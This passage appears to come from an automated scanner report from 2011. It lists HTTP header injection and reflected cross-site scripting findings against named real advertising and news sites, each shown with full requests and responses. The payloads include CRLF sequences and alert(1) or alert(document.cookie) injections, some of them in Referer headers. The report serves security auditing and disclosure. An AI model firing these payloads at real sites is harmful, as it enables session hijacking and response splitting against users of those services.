The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload f761f%0d%0a84ae002f268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=1;ac17=1;ac16=1;ac14=1;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;sz=24x24;dcmt=text/html;ord=1295452268743?&f761f%0d%0a84ae002f268=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Access-Control-Allow-Origin: *
DCLK_imp: v7;x;214948934;0-0;0;58826896;24/24;31459665/31477541/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;ac17=1;ac16=1;ac14=1;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;sz=24x24;dcmt=text/html;;f761f
84ae002f268
=1;~cs=i:
Date: Wed, 19 Jan 2011 17:59:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 367

DoubleClick.onAdLoaded('MediaAlert', {"impressionUrl": "http://ad.doubleclick.net/imp;v7;x;214948934;0-0;0;58826896;24/24;31459665/31477541/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;ac17=1;ac16=
...[SNIP]...

3.3. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload af523%0d%0ad8de1a54e2 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=af523%0d%0ad8de1a54e2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Date: Wed, 19 Jan 2011 17:59:34 GMT
Expires: Wed, 19 Jan 2011 17:59:34 GMT
DCLK_imp: v7;x;44306;0-0;0;58826896;0/0;0/0/0;;~aopt=2/0/ff/0;~okv=;secure=af523
d8de1a54e2
;~cs=n:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a94/0/0/%2a/g;44306;0-0;0;58826896;783-50/50;0/0/0;;~aopt=2/0/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.4. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:99487
1735d591256
;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:47 GMT
Date: Wed, 19 Jan 2011 18:00:54 GMT
Connection: close
Content-Length: 2018

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',99487
1735
...[SNIP]...

3.5. http://livingsocial.com/deals/socialads_reflector [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://livingsocial.com
Path:   /deals/socialads_reflector

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1
Host: livingsocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 19 Jan 2011 18:10:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80
7b239144ac4


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

4. Cross-site scripting (reflected)
There are 364 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:00:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

4.2. http://ads.gmodules.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 125f6%0aalert(1)//47c7f0d831b was submitted in the url parameter. This input was echoed as 125f6
alert(1)//47c7f0d831b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayak2%2F728x90.xml125f6%0aalert(1)//47c7f0d831b&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26num%3D1%26ggladgrp%3D10345345168030795840%26gglcreat%3D9988352204398423926%26sig%3DAGiWqtx_MMUhrwT9GMn6hHLnk8PZwdyM9g%26client%3Dca-pub-4103679352234073%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26sigh%3Dc3WzeS_619k%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=1&up_rawquery=las%20vegas%20hotel%20promotions&up_city=Washington&up_region=US-DC&up_lat=38.90&up_long=-77.04\ HTTP/1.1
Host: ads.gmodules.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:05:28 GMT
Expires: Wed, 19 Jan 2011 18:05:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayak2/728x90.xml125f6
alert(1)//47c7f0d831b
. HTTP error 400

4.3. http://ads.roiserver.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250842ab';alert(1)//40a370322b1" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.4. http://ads.roiserver.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:28 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.5. http://ads.roiserver.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300b68a5';alert(1)//ef73ca3b12e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.6. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:23 GMT
Date: Wed, 19 Jan 2011 17:59:23 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"256c1b<script>alert(1)</script>1d321066f7f", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.7. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:36 GMT
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"33c9b<script>alert(1)</script>7d5427cace2", c16:"", r:""});

4.8. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:24 GMT
Date: Wed, 19 Jan 2011 17:59:24 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603578690558<script>alert(1)</script>0af258cd0b5", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.9. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:26 GMT
Date: Wed, 19 Jan 2011 17:59:26 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
